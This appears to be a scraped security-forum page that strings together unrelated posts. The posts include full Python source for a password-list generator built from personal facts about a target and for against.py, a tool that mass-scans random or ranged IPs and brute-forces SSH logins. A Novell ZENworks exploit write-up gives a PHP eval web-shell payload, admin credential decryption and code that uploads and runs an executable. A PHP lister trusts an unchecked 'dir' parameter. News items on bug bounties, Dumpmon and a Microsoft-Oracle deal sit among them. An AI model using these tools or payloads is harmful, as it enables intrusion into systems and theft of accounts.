Fi8sVrs

What is it? It’s an automated word list generator. What is a word list? Word list is like a list of possible passwords that you can use to crack hashes with, perform brute force attacks on various protocols & may be used for just about any cracking in general. Why would I need an automated word list generator? Well, actually you don’t need to generate your own as there are already some pretty good word lists floating around on the web. But there are times when you would want a personalized word list to fine tune your attacks; especially if you know the target well. In such cases automated word list generators may come in handy as it allows you to make educated guesses regarding what the password might be rather than just brute forcing with totally random, irrelevant word list. How is it different? Gen2k is still in beta, but works flawlessly as of now. It’s not your typical word list generator, and doesn’t intend to be one. There are already good ones out there like Crunch, etc. Gen2k aims to be a smart word list generator, it takes sample words as input. Sample words can be anything that you know about the target, from area, date of birth to names & special events, etc. Once a list of all those known words have been supplied to Gen2k, it automatically, based on the options set..determines the best possible way to make a word list out of those. As many of you know, people tend to use birth year, specific dates, random numbers, custom words attached to simple words in order to make their passwords more complex. Gen2k aims to exploit those types of weaknesses along with conversion of words to upper & lower cases to make your word list completely personalized & appropriate for the situation. It has most of the features that I thought of implementing when I started working on it and obviously it can be improved further. It’s written completely in Python. It’s fast, light weight & doesn’t have any external dependencies. What are it’s features? Generates password combinations by combining supplied words. Mixes frequently used number patterns with words. Generates password combinations using year/date combo. Mixes custom user defined value(s) combination with words. Option to auto convert words to upper/lowercase & capitalisation. WPA/WPA2 password validation check. No external dependencies. So what does it look like? The list can get very large indeed, so make sure you choose the options wisely. Where can I get it? #!/usr/bin/env python__author__ = 'irenicus09' __email__ = 'irenicus09[at]gmail[dot]com' __license__ = 'BSD' __version__ = 'BETA' __date__ = '18/05/2013' import sys """ ############################## GEN2K #################################### Automated Word List Generator > Generates passwords combinations by combining words from wordlist. > Covers frequently used number patterns used along with words. > Generates passwords combinations using year/date combo. > Generates custom user defined value(s) combination with word list. > Option to auto convert words to upper/lowercase & capitalisation. > WPA/WPA2 password validation check. > No external dependencies. --------------------------------------------------------------------------- HINTS: * DO NOT USE A GENERAL PURPOSE WORDLIST * SUPPLIED WORDLIST MUST ONLY CONTAIN KNOWN FACTS ABOUT TARGET E.G NAMES, ADDRESS, FAVORITE ARTIST, PLACE, EVENT, ETC. * TRY TO KEEP WORDLIST AT A MINIMUM, DON'T INCLUDE TOO MUCH DETAILS * THE FINAL GENERATED WORD LIST CAN GET EXTREMELY LARGE! ########################################################################### """ def help(): print """ ###### ######## ## ## ####### ## ## ## ## ## ### ## ## ## ## ## ## ## #### ## ## ## ## ## #### ###### ## ## ## ####### ##### ## ## ## ## #### ## ## ## ## ## ## ## ### ## ## ## ###### ######## ## ## ######### ## ## %s ======= Automated Word List Generator ======= Copyright © irenicus09 2013 USAGE: ./gen2k.py -w <wordlist> -o <output> [options] [ -c ] Enable word combination among the words in wordlist. [ -d ] Custom comma separated values to combine with wordlist. [ -e ] Enable wpa/wpa2 fitness check for generated passwords. [ -h ] Prints this help. [ -n ] Enable frequently used number combination with wordlist. [ -o ] Output filename. [ -w ] Path to word list file. Wordlist must contain info related to Target. [ -y ] Enable year combination with wordlist. [ -z ] Enable conversion of words to upper & lower case letters. Note: Conversion to upper/lowercase & capitalisation takes place before other modes are applied to the original list. """ % __version__ def main(): if exist('-h'): help() sys.exit(0) if not (exist('-w') or exist('-o')): help() sys.exit(1) master_list = load_words(find('-w')) # List supplied by user data = [] # Final wordlist temp = [] # Temporary wordlist if exist('-z'): master_list = gen_case(master_list) data = master_list if exist('-c'): temp = gen_word_combo(master_list) data = list(set(temp+data)) if exist('-n'): temp = gen_numbers(master_list) data = list(set(temp+data)) if exist('-y'): temp = gen_year(master_list) data = list(set(temp+data)) if exist('-d'): try: custom_values = find('-d').split(',') except (AttributeError): print '[!] Are you kidding me with no values?' sys.exit(1) temp = gen_custom(master_list, custom_values) data = list(set(temp+data)) if exist('-e'): data = wpa_validation_check(data) write_file(find('-o'), data) print '[*] Total words generated: %d' % (len(data)) sys.exit(0) def merge_list(temp_list=[], final_list=[]): """ Merges contents from temp_list (1st param) with final_list (2nd param) """ for word in temp_list: if word not in final_list: final_list.append(word) def load_words(path_to_file): """ Function to fetch all possible words. """ data = [] try: handle = open(path_to_file, 'r') temp_list = handle.readlines() handle.close() except(BaseException): print '[!] Error occured while reading wordlist.' sys.exit(1) for word in temp_list: word = word.strip() if word != '': data.append(word) return data def write_file(path_to_file, data=[]): """ Writing to specified file. """ try: handle = open(path_to_file, 'wb+') for word in data: handle.write(word+'\n') handle.close() except(BaseException): print '[!] Error occured while writing to file.' sys.exit(1) def gen_case(words=[]): """ Function to change words to Upper & Lower case. """ custom_list = [] for x in words: custom_list.append(x.lower()) custom_list.append(x.capitalize()) custom_list.append(x.upper()) return list(set(custom_list)) def gen_numbers(words=[]): """ Function to mix words with commonly used numbers patterns. """ word_list = [] if len(words) <= 0: return word_list num_list = ['0', '01', '012', '0123', '01234', '012345', '0123456', '01234567', '012345678', '0123456789', '1', '12', '123', '1234','12345', '123456','1234567','12345678','123456789', '1234567890', '9876543210', '987654321', '87654321', '7654321', '654321', '54321', '4321', '321', '21'] for word in words: for num in num_list: word_list.append((word+num)) word_list.append((num+word)) return word_list def gen_year(words=[]): """ Function to mix auto generated year with words from wordlist. Hint: Date of birth & special dates are often combined with certain words to form passwords. """ word_list = [] if len(words) <= 0: return word_list # Double digit dates start = 1 while(start <= 99): for word in words: word_list.append(word + str("%02d") % (start)) word_list.append(str("%02d") % start + word) start += 1 # Four digit dates start = 1900 while (start <= 2020): for word in words: word_list.append(word+str(start)) word_list.append(str(start)+word) start += 1 return word_list def gen_word_combo(words=[]): """ Function to mix multiple words from given list. """ word_list = [] if len(words) <= 1: return word_list for word in words: for second_word in words: if word != second_word: word_list.append(second_word+word) return word_list def gen_custom(words=[], data=[]): """ Funtion to combine user defined input with wordlist. > Takes a comma separated list via cmdline as values. """ word_list = [] if (len(words) <= 0 or len(data) <= 0): return word_list for item in data: for word in words: word_list.append(item+word) word_list.append(word+item) return word_list def wpa_validation_check(words=[]): """ Function to optimise wordlist for wpa cracking > Removes Duplicates. > Removes passwords < 8 or > 63 characters in length. """ custom_list = list(set(words)) custom_list = [x for x in custom_list if not (len(x) < 8 or len(x) > 63)] return custom_list # S3my0n's argument parsers, thx brah def find(flag): try: a = sys.argv[sys.argv.index(flag)+1] except (IndexError, ValueError): return None else: return a def exist(flag): if flag in sys.argv[1:]: return True else: return False if __name__ == '__main__': main() or [Python] Gen2k [Automated Word List Generator] - Pastebin.com Source: https://irenicus09.wordpress.com/2013/05/19/gen2k-automated-wordlist-generator/

the following code is all you need to have a proxy up and running in like 10 seconds from flask import Flask from flask import request import requests app = Flask(__name__) hosttorequest = 'www.cnn.com' @app.route('/') def root(): r = requests.get('http://'+hosttorequest+'/') return r.content @app.route('/<path:other>') def other(other): r = requests.get('http://'+hosttorequest+'/'+other) return r.content if __name__ == '__main__': app.run(host='0.0.0.0', port=80) Now this sure makes it easy to start hiding some stuff in there. To get it up and running just do: sudo python filename.py Quick tiny python web proxy | DiabloHorn

categorie gresita

Microsoft has issued its first bug bounty award to a Google engineer. The software maker created several bug bounties late last month that will run until the end of July. The IE11 preview bug bounty awards up to $11,000 for critical vulnerabilities, and Google engineer Ivan Fratric is the first to be awarded for his vulnerability. Microsoft has traditionally avoided general and public bug bounty programs in the past, opting to hold smaller contests for specific exploits. Microsoft's Katie Moussouris revealed that the company has issued its first bug bounty in a blog post recently, but Moussouris stopped short of identifying the individual involved. In a Twitter post on Thursday, Moussouris congratulated the Google employee on being the first to qualify for the IE11 bug bounty. The win is ironic, but not unusual. Google engineers regularly report security issues in Microsoft's software direct to the company, and some choose the open and public approach of disclosure. "Microsoft wants to squash bugs earlier" While Microsoft's bug bounty program offers up to $11,000 as a reward, it's not clear how much the company is paying for its first successful entry. "We have other researchers who have qualified for bounties under the IE11 program as well," notes Moussouris. Over a dozen issues have been reported to Microsoft in the first two weeks since the bug bounties launched, more than the company normally receives during an average month. Happy with its strategy so far, Moussouris explains that "It’s not about offering the most money," instead focusing on gathering the bugs during Microsoft's preview stages of product releases. With a more frequent cycle of updates planned for Windows, these bug bounty programs could become essential for Microsoft during its new focus on "rapid pace" software and services updates. Source: Google engineer first to profit from Microsoft's cash for bugs program | The Verge

scriptul func?ioneazã #Router option requires the paramiko module for shh connections.

<?php if(isset($_REQUEST['dir'])) { $current_dir = $_REQUEST['dir']; } else { $current_dir = 'folder'; } if ($handle = opendir($current_dir)) { while (false !== ($file_or_dir = readdir($handle))) { if(in_array($file_or_dir, array('.', '..'))) continue; $path = $current_dir.'/'.$file_or_dir; if(is_file($path)) { echo '<a href="'.$path.'">'.$file_or_dir."\n</a><br/>"; } else { echo '<a href="script.php?dir='.$path.'">'.$file_or_dir."\n</a><br/>"; } } closedir($handle); } ?>

list.php <?php if ($handle = opendir('folder')) { while (false !== ($entry = readdir($handle))) { if ($entry != "." && $entry != "..") { echo "$entry\n"; } } closedir($handle); } ?> sau http://php.net/manual/en/function.scandir.php

Poison Ivy - Remote Administration Tool ?

about: #!/usr/bin/env python # -*- coding: latin-1 -*- ###################################################### # ____ _ __ # # ___ __ __/ / /__ ___ ______ ______(_) /___ __ # # / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / # # /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / # # /___/ team # # # # against.py - mass scanning and brute-forcing script for ssh # # # # FILE # # against.py # # # # DATE # # 2013-06-25 # # # # DESCRIPTION # # 'against.py' is a very fast ssh attacking script which includes a # # multithreaded port scanning module (tcp connect) for discovering possible # # targets and a multithreaded brute-forcing module which attacks # # parallel (multiprocessing) all discovered hosts or given ip-adresses # # from a list. # # # # AUTHOR # # pigtail23 aka pgt # # # ################################################################################ against.py: #!/usr/bin/env pythonfrom socket import * import multiprocessing import threading import time import paramiko import sys import os import logging import argparse import random # print our nice banner def banner(): print '--==[ against.py by pigtail23@nullsecurity.net ]==--' # print version def version(): print '[+] against.py v0.1' exit(0) # checks if we can write to file which was given by parameter -o def test_file(filename): try: outfile = open(filename, 'a') outfile.close() except: print '[-] ERROR: Cannot write to file \'%s\'' % filename exit(1) # defines the command line parameter and help page def argspage(): parser = argparse.ArgumentParser( usage='\n\n ./%(prog)s -i <arg> | -r <arg> | -I <arg>', formatter_class=argparse.RawDescriptionHelpFormatter, epilog= 'examples:\n\n' \ ' scanning and attacking random ips\n' \ ' usage: ./%(prog)s -r 50 -L password.txt\n\n' \ ' scanning and attacking an ip-range\n' \ ' usage: ./%(prog)s -i 192.168.0.1-254 -u admin -l troll\n\n' \ ' attack ips from file\n' \ ' usage: ./%(prog)s -I ips.txt -L passwords.txt\n', add_help=False ) options = parser.add_argument_group('options', '') options.add_argument('-i', default=False, metavar='<ip/range>', help='ip-address/-range (e.g.: 192.168.0-3.1-254)') options.add_argument('-I', default=False, metavar='<file>', help='list of target ip-addresses') options.add_argument('-r', default=False, metavar='<num>', help='attack random hosts') options.add_argument('-p', default=22, metavar='<num>', help='port number of sshd (default: 22)') options.add_argument('-t', default=4, metavar='<num>', help='threads per host (default: 4)') options.add_argument('-f', default=8, metavar='<num>', help='attack max hosts parallel (default: 8)') options.add_argument('-u', default='root', metavar='<username>', help='single username (default: root)') options.add_argument('-U', default=False, metavar='<file>', help='list of usernames') options.add_argument('-l', default='toor', metavar='<password>', help='single password (default: toor)') options.add_argument('-L', default=False, metavar='<file>', help='list of passwords') options.add_argument('-o', default=False, metavar='<file>', help='write found logins to file') options.add_argument('-T', default=3, metavar='<sec>', help='timeout in seconds (default: 3)') options.add_argument('-V', action='store_true', help='print version of against.py and exit') args = parser.parse_args() if args.V: version() if (args.i == False) and (args.I == False) and (args.r == False): print '' parser.print_help() exit(0) return args # connect to target and checks for an open port def scan(target, port, timeout): s = socket(AF_INET, SOCK_STREAM) s.settimeout(timeout) result = s.connect_ex((target, port)) s.close() if result == 0: HOSTLIST.append(target) # creates 'x' numbers of threads and call scan() def thread_scan(args, target): port = int(args.p) to = float(args.T) bam = threading.Thread(target=scan, args=(target, port, to,)) bam.start() # scanning with up to 200 threads for targets with open port while threading.activeCount() > 200: time.sleep(0.0001) time.sleep(0.0001) # only the output when scanning for targets def scan_output(i): sys.stdout.flush() sys.stdout.write('\r[*] hosts scanned: {0} | ' \ 'possible to attack: {1}'.format(i, len(HOSTLIST))) # creates single ips by a given ip-range - parameter -i def ip_range(args): targets = args.i a = tuple(part for part in targets.split('.')) rsa = (range(4)) rsb = (range(4)) for i in range(0,4): ga = a.find('-') if ga != -1: rsa = int(a[:ga]) rsb = int(a[1+ga:]) + 1 else: rsa = int(a) rsb = int(a) + 1 print '[*] scanning %s for ssh services' % targets m = 0 for i in range (rsa[0], rsb[0]): for j in range (rsa[1], rsb[1]): for k in range (rsa[2], rsb[2]): for l in range(rsa[3], rsb[3]): target = '%d.%d.%d.%d' % (i, j, k, l) m += 1 scan_output(m) thread_scan(args, target) # waiting for the last running threads while threading.activeCount() > 1: time.sleep(0.1) scan_output(m) print '\n[*] finished scan.' # only refactor stuff def rand(): return random.randrange(0,256) # creates random ips def rand_ip(args): i = 0 print '[*] scanning random ips for ssh services' while len(HOSTLIST) < int(args.r): target = '%d.%d.%d.%d' % (rand(), rand(), rand(), rand()) i += 1 scan_output(i) thread_scan(args, target) # waiting for the last running threads while threading.activeCount() > 1: time.sleep(0.1) scan_output(i) print '\n[*] finished scan.' # checks if given filename by parameter exists def file_exists(filename): try: open(filename).readlines() except IOError: print '[-] ERROR: cannot open file \'%s\'' % filename exit(1) # read-in a file with ips def ip_list(ipfile): file_exists(ipfile) hosts = open(ipfile).readlines() for host in hosts: HOSTLIST.append(host) # write all found logins to file - parameter -o def write_logins(filename, login): outfile = open(filename, 'a') outfile.write(login) outfile.close() # connect to target and try to login def crack(target, prt, user, passw, outfile, to, i): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) user = user.replace('\n', '') passw = passw.replace('\n', '') try: ssh.connect(target, port=prt, username=user, password=passw, timeout=to) #ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command('uname -a') #print ssh_stdout login = '[+] login found for %s | %s:%s' % (target, user, passw) print login if outfile: write_logins(outfile, login + '\n') ssh.close() os._exit(0) except paramiko.AuthenticationException: ssh.close() except: ssh.close() # after 8 timeouts per request the attack against $target will stopped if i < 8: i += 1 # reconnect after random seconds (between 0.2 and 0.5 sec) ra = random.uniform(0.2, 0.6) time.sleep(ra) crack(target, prt, user, passw, outfile, to, i) else: print '[-] too much timeouts - stopped attack against %s' % (target) os._exit(1) # creates 'x' number of threads and call crack() def thread_it(target, args): port = int(args.p) user = args.u userlist = args.U password = args.l passlist = args.L outfile = args.o to = float(args.T) threads = int(args.t) if userlist: user = open(userlist).readlines() else: user = [ user ] if passlist: password = open(passlist).readlines() else: password = [ password ] # looks dirty but we need it :/ try: for us in user: for pw in password: Run = threading.Thread(target=crack, args=(target, port, us, pw, outfile, to, 0,)) Run.start() # checks that we a max number of threads while threading.activeCount() > threads: time.sleep(0.01) time.sleep(0.001) # waiting for the last running threads while threading.activeCount() > 1: time.sleep(0.1) except KeyboardInterrupt: os._exit(1) # create 'x' child processes (child == cracking routine for only one target) def fork_it(args): threads = int(args.t) childs = int(args.f) len_hosts = len(HOSTLIST) print '[*] attacking %d target(s)\n' \ '[*] cracking up to %d hosts parallel\n' \ '[*] threads per host: %d' % (len_hosts, childs, threads) i = 1 for host in HOSTLIST: host = host.replace('\n', '') print '[*] performing attacks against %s [%d/%d]' % (host, i, len_hosts) hostfork = multiprocessing.Process(target=thread_it, args=(host, args)) hostfork.start() # checks that we have a max number of childs while len(multiprocessing.active_children()) >= childs: time.sleep(0.001) time.sleep(0.001) i += 1 # waiting for the last running childs while multiprocessing.active_children(): time.sleep(1) def empty_hostlist(): if len(HOSTLIST) == 0: print '[-] found no targets to attack!' exit(1) # output when against.py finished all routines def finished(): print '[*] game over!!! have fun with your new b0xes!' def main(): banner() args = argspage() if args.U: file_exists(args.U) if args.L: file_exists(args.L) if args.o: test_file(args.o) if args.i: ip_range(args) elif args.I: ip_list(args.I) else: rand_ip(args) time.sleep(0.1) empty_hostlist() fork_it(args) finished() if __name__ == '__main__': HOSTLIST = [] try: logging.disable(logging.CRITICAL) main() except KeyboardInterrupt: print '\nbye bye!!!' time.sleep(0.2) os._exit(1) Modules need: paramiko: sudo apt-get install python-paramiko argparse: sudo apt-get install python-argparse usage: chmod u+x against.py --==[ against.py by pigtail23@nullsecurity.net ]==-- ./against.py -i <arg> | -r <arg> | -I <arg> options: -i <ip/range> ip-address/-range (e.g.: 192.168.0-3.1-254) -I <file> list of target ip-addresses -r <num> attack random hosts -p <num> port number of sshd (default: 22) -t <num> threads per host (default: 4) -f <num> attack max hosts parallel (default: 8) -u <username> single username (default: root) -U <file> list of usernames -l <password> single password (default: toor) -L <file> list of passwords -o <file> write found logins to file -T <sec> timeout in seconds (default: 3) -V print version of against.py and exit examples: scanning and attacking random ips usage: ./against.py -r 50 -L password.txt scanning and attacking an ip-range usage: ./against.py -i 192.168.0.1-254 -u admin -l troll attack ips from file usage: ./against.py -I ips.txt -L passwords.txt Source: nullsecurity

Mac OS X 10.5 (Leopard) and 10.6 (Snow Leopard) come pre-installed with Ruby 1.8, but we recommend that you install Ruby 1.9 from MacPorts instead. Install MacPorts Make sure you have Xcode installed - http://developer.apple.com/tools/xcode/ Download and install the .dmg from MacPorts - The MacPorts Project -- Home Verify that MacPorts is up to date $ sudo port selfupdate Install Ruby 1.9.1 Once MacPorts has been configured, you can install a new version of Ruby and RubyGems with the following command: $ sudo port install ruby19 +nosuffix This will install ruby into /opt/local/ For a complete listing of all the files that were installed, run: $ port contents ruby19 You should verify that your PATH is set correctly such that /opt/local/bin is listed before /usr/bin. $ echo $PATH /opt/local/bin:/opt/local/sbin:/usr/bin:/bin:/usr/sbin:/sbin $ which ruby gem /opt/local/bin/ruby /opt/local/bin/gem Install a database (optional) Some Metasploit Framework functionality requires a database. We support and recommend using postgres. That said, the Metasploit Framework also contains drivers for MySQL. PostgreSQL: $ sudo env PATH=/opt/local/lib/postgresql84/bin/:$PATH $ sudo port install postgresql84-server $ sudo gem install pg MySQL: $ sudo port install mysql5-server $ sudo gem install mysql Install and use the Metasploit Framework Once Ruby and RubyGems have been properly installed, download the Unix tarball from the Metasploit Framework Website and extract it to the directory of your choice. Change into the framework3 directory and execute msfconsole to get started. Source: https://community.rapid7.com/docs/DOC-1037

I'm pretty sure the reason Novell titled their Mobile Device Management (MDM, yo) under the 'Zenworks' group is because the developers of the product HAD to be in a state of meditation (sleeping) when they were writing the code you will see below. Time to wake up - For some reason the other night I ended up on the Vupen website and saw the following advisory on their page: Novell ZENworks Mobile Management LFI Remote Code Execution (CVE-2013-1081) [bA+Code] I took a quick look around and didn’t see a public exploit anywhere so after discovering that Novell provides 60 day demos of products, I took a shot at figuring out the bug. The actual CVE details are as follows: “Directory traversal vulnerability in MDM.php in Novell ZENworks Mobile Management (ZMM) 2.6.1 and 2.7.0 allows remote attackers to include and execute arbitrary local files via the language parameter.” After setting up a VM (Zenworks MDM 2.6.0) and getting the product installed it looked pretty obvious right away ( 1 request?) where the bug may exist: POST /DUSAP.php HTTP/1.1 Host: 192.168.20.133 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.20.133/index.php Cookie: PHPSESSID=3v5ldq72nvdhsekb2f7gf31p84 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 74 username=&password=&domain=&language=res%2Flanguages%2FEnglish.php&submit= Pulling up the source for the “DUSAP.php” script the following code path stuck out pretty bad: <?php session_start(); $UserName = $_REQUEST['username']; $Domain = $_REQUEST['domain']; $Password = $_REQUEST['password']; $Language = $_REQUEST['language']; $DeviceID = ''; if ($Language !== '' && $Language != $_SESSION["language"]) { //check for validity if ((substr($Language, 0, 14) == 'res\\languages\\' || substr($Language, 0, 14) == 'res/languages/') && file_exists($Language)) { $_SESSION["language"] = $Language; } } if (isset($_SESSION["language"])) { require_once( $_SESSION["language"]); } else { require_once( 'res\languages\English.php' ); } $_SESSION['$DeviceSAKey'] = mdm_AuthenticateUser($UserName, $Domain, $Password, $DeviceID); In English: Check if the "language" parameter is passed in on the request If the "Language" variable is not empty and if the "language" session value is different from what has been provided, check its value The "validation" routine checks that the "Language" variable starts with "res\languages\" or "res/languages/" and then if the file actually exists in the system If the user has provided a value that meets the above criteria, the session variable "language" is set to the user provided value If the session variable "language" is set, include it into the page Authenticate So it is possible to include any file from the system as long as the provided path starts with “res/languages” and the file exists. To start off it looked like maybe the IIS log files could be a possible candidate to include, but they are not readable by the user everything is executing under…bummer. The next spot I started looking for was if there was any other session data that could be controlled to include PHP. Example session file at this point looks like this: $error|s:12:"Login Failed";language|s:25:"res/languages/English.php";$DeviceSAKey|i:0; The "$error" value is server controlled, the "language" has to be a valid file on the system (cant stuff PHP in it), and "$DeviceSAKey" appears to be related to authentication. Next step I started searching through the code for spots where the "$_SESSION" is manipulated hoping to find some session variables that get set outside of logging in. I ran the following to get a better idea of places to start looking: egrep -R '\$_SESSION\[.*\] =' ./ This pulled up a ton of results, including the following: /desktop/download.php:$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT']; Taking a look at the “download.php” file the following was observed: <?php session_start(); if (isset($_SESSION["language"])) { require_once( $_SESSION["language"]); } else { require_once( 'res\languages\English.php' ); } $filedata = $_SESSION['filedata']; $filename = $_SESSION['filename']; $usersakey = $_SESSION['UserSAKey']; $_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT']; $active_user_agent = strtolower($_SESSION['user_agent']); $ext = substr(strrchr($filename, '.'), 1); if (isset($_SESSION['$DeviceSAKey']) && $_SESSION['$DeviceSAKey'] > 0) { } else { $_SESSION['$error'] = LOGIN_FAILED_TEXT; header('Location: index.php'); } The first highlighted part sets a new session variable "user_agent" to whatever our browser is sending, good so far.... The next highlighted section checks our session for "DeviceSAKey" which is used to check that the requester is authenticated in the system, in this case we are not so this fails and we are redirected to the login page ("index.php"). Because the server stores our session value before checking authentication (whoops) we can use this to store our payload to be included This will create a session file named "sess_payload" that we can include, the file contains the following: user_agent|s:34:"<?php echo(eval($_GET['cmd'])); ?>";$error|s:12:"Login Failed"; Now, I’m sure if you are paying attention you’d say “wait, why don’t you just use exec/passthru/system”, well the application installs and configures IIS to use a “guest” account for executing everything – no execute permissions for system stuff (cmd.exe,etc) . It is possible to get around this and gain system execution, but I decided to first see what other options are available. Looking at the database, the administrator credentials are “encrypted”, but I kept seeing a function being used in PHP when trying to figure out how they were “encrypted”: mdm_DecryptData(). No password or anything is provided when calling the fuction, so it can be assumed it is magic: return mdm_DecryptData($result[0]['Password']); Ends up it is magic – so I sent the following PHP to be executed on the server - $pass=mdm_ExecuteSQLQuery("SELECT Password FROM Administrators where AdministratorSAKey = 1",array(),false,-1,"","","",QUERY_TYPE_SELECT); echo $pass[0]["UserName"].":".mdm_DecryptData($pass[0]["Password"]); Now that the password is available, you can log into the admin panel and do wonderful things like deploy policy to mobile devices (CA + proxy settings , wipe devices, pull text messages, etc…. This functionality has been wrapped up into a metasploit module that is available on github: https://github.com/steponequit/CVE-2013-1081/blob/master/novell_mdm_creds.rb Next up is bypassing the fact we cannot use "exec/system/passthru/etc" to execute system commands. The issue is that all of these commands try and execute whatever is sent via the system "shell", in this case "cmd.exe" which we do not have rights to execute. Lucky for us PHP provides "proc_open", specifically the fact "proc_open" allows us to set the "bypass_shell" option. So knowing this we need to figure out how to get an executable on the server and where we can put it. The where part is easy, the PHP process user has to be able to write to the PHP "temp" directory to write session files, so that is obvious. There are plenty of ways to get a file on the server using PHP, but I chose to use "php://input" with the executable base64'd in the POST body: $wdir=getcwd()."\..\..\php\\\\temp\\\\"; file_put_contents($wdir."cmd.exe",base64_decode(file_get_contents("php://input"))); This bit of PHP will read the HTTP post’s body (php://input) , base64 decode its contents, and write it to a file in a location we have specified. This location is relative to where we are executing so it should work no matter what directory the product is installed to. After we have uploaded the file we can then carry out another request to execute what has been uploaded: $wdir=getcwd()."\..\..\php\\\\temp\\\\"; $cmd=$wdir."cmd.exe"; $output=array(); $handle=proc_open($cmd,array(1=>array("pipe","w")),$pipes,null,null,array("bypass_shell"=>true)); if(is_resource($handle)) { $output=explode("\\n",+stream_get_contents($pipes[1])); fclose($pipes[1]); proc_close($handle); } foreach($output+as &$temp){echo+$temp."\\r\\n";}; The key here is the “bypass_shell” option that is passed to “proc_open”. Since all files that are created by the process user in the PHP “temp” directory are created with “all of the things” permissions, we can point “proc_open” at the file we have uploaded and it will run This process was then rolled up into a metasploit module which is available here: https://github.com/steponequit/CVE-2013-1081/blob/master/novell_mdm_lfi.rb Update: Metasploit modules are now available as part of metasploit. Source: consolecowboys: Novell Zenworks MDM: Mobile Device Management for the Masses

Dumpmon scours Twitter for sensitive data hiding in plain sight. Password and credit-card details leak online every day. So no one really knows just how much personally identifiable information is available by clicking on the right link to Pastebin, Pastie, or similar sites. Using a platform that runs on the hobbyist Raspberry Pi platform to drink from this fire hose, a security researcher has cataloged more than 3,000 such posts in less than three months while adding scores more each week. Dumpmon, as the project is called, is a bot that monitors Twitter messages for Web links containing account credentials, sensitive account information, and other "interesting" content. Since its debut on April 3, it has captured more than 3,300 records containing 1.1 million addresses, most of which are accompanied by the plaintext or cryptographic hash of an associated password. The project has also unearthed social security and driver license numbers, credit card data, and other information that could be used to hijack user accounts or commit identity theft. On average, Dumpmon collects 51 such posts each day. "It was mainly trying to determine how much information is being hidden from plain view and finding out how much information can be found just by looking in the right place," said Jordan Wright, a security engineer for CoNetrix. (Wright created the Dumpmon as an independent side project.) "It's pretty incredible. I wasn't expecting as much information as I found. I was expecting a lot less for sure." The "dumps," as the online data postings are called, are frequently published to embarrass the victims or as a means for hacking crews to demonstrate their prowess to rivals. Often, dumps are advertised on Twitter or another social networking site with a line or two of vague or cryptic text and a link. In the span it takes to comb through one such posting, a half-dozen or more additional dumps may be posted. The frequency makes it hard for outsiders to keep tabs. Of the 620 records Wright has analyzed in depth, the researcher recovered 174,423 e-mail addresses accompanied by a hashed or plaintext password. With so many sites using e-mail addresses as account user IDs, the data often gives attackers all they need to access multiple accounts maintained by a victim. In the event the owner has used the same address and password to secure other accounts—or even the e-mail address itself—attackers can reuse the credentials to hijack those as well. Of the 174,423 e-mail addresses Wright analyzed in depth, more than 120,000 of them were accompanied by a plain-text password. The remaining passwords were expressed as cryptographic hashes, which are frequently trivial to crack. Account credentials are by no means the only valuable data included in these postings. The 620 records Wright analyzed for this article also contained what appeared to be valid data for 1,496 payment cards. In many cases, data collected by Dumpmon included bank account numbers and home addresses. Other files observed by Ars included social security and driver license numbers, first and last names, addresses, and medical diagnoses contained on health records. Dumps also contained passwords stored on computers that had been infected by malware. "These full identity dumps are probably more of the higher commodity item," Wright said of the records containing social security numbers, names, and addresses. "As far as why these were dumped for free, that's the answer I'm looking for: Why people are giving this information out?" Some of the data—for instance, a recent dump posted to Pastebin that Ars will not link to—appears to be derived from browsers that were configured to store frequently used account IDs and passwords. When the computers are infected with malware, the credentials are dumped to a file that later gets posted online. The discoveries led Wright to publish a post documenting how Google Chrome, Internet Explorer, and other browsers store passwords. Incidentally, Wright concluded users shouldn't trust their passwords to these storage systems, but I'm not so sure. Any computer that is infected with malware that provides a backdoor onto the system is already vulnerable to wholesale password theft. In fairness to Wright, the sensitive details may be easier or quicker to gather en masse when they're stored in a browser. Other dumps cataloged by Dumpmon included private SSH encryption keys used to administer websites, configuration files for Cisco routers, and logs from successful malware infections. To keep things interesting, Dumpmon has been designed to run on the Raspberry Pi platform. "The goal was to find a happy balance between both obtaining new pastes from the different sites, as well as processing the existing pastes in the queue to determine if they are interesting," Wright said. "This created challenges, since the Raspberry Pi has limited hardware capability and I was monitoring for quite a few things." Because posts on Pastebin and other sites are often taken down by the original poster or site administrators, Dumpmon also copies and stores the contents of each one. While Wright has published the underlying code for anyone to use, he said he makes the cached data available only to white hat researchers. "I don't want to make it easier for the wrong people," he explained. "My goal was as best as I could only give it to people who will use it responsibly." Via

Deal will help customers embrace cloud computing by providing greater choice and flexibility. REDMOND, Wash., and REDWOOD CITY, Calif. — June 24, 2013 — Microsoft Corp. and Oracle Corp. today announced a partnership that will enable customers to run Oracle software on Windows Server Hyper-V and in Windows Azure. Customers will be able to deploy Oracle software — including Java, Oracle Database and Oracle WebLogic Server — on Windows Server Hyper-V or in Windows Azure and receive full support from Oracle. Terms of the deal were not disclosed. As part of this partnership, Oracle will certify and support Oracle software — including Java, Oracle Database and Oracle WebLogic Server — on Windows Server Hyper-V and in Windows Azure. Microsoft will also offer Java, Oracle Database and Oracle WebLogic Server to Windows Azure customers, and Oracle will make Oracle Linux available to Windows Azure customers. Java developers, IT professionals and businesses will benefit from the flexibility to deploy fully supported Oracle software to Windows Server Hyper-V and Windows Azure. “Microsoft is deeply committed to giving businesses what they need, and clearly that is the ability to run enterprise workloads in private clouds, public clouds and, increasingly, across both,” said Steve Ballmer, chief executive officer of Microsoft. “Now our customers will be able to take advantage of the flexibility our unique hybrid cloud solutions offer for their Oracle applications, middleware and databases, just like they have been able to do on Windows Server for years.” “Our customers’ IT environments are changing rapidly to meet the dynamic nature of the world today,” said Oracle President Mark Hurd. “At Oracle, we are committed to providing greater choice and flexibility to customers by providing multiple deployment options for our software, including on-premise as well as public, private, and hybrid clouds. This collaboration with Microsoft extends our partnership and is important for the benefit of our customers.” For additional information on support and licensing mobility changes that went into effect today please see Oracle’s blog: https://blogs.oracle.com/cloud/entry/oracle_and_microsoft_join_forces Via

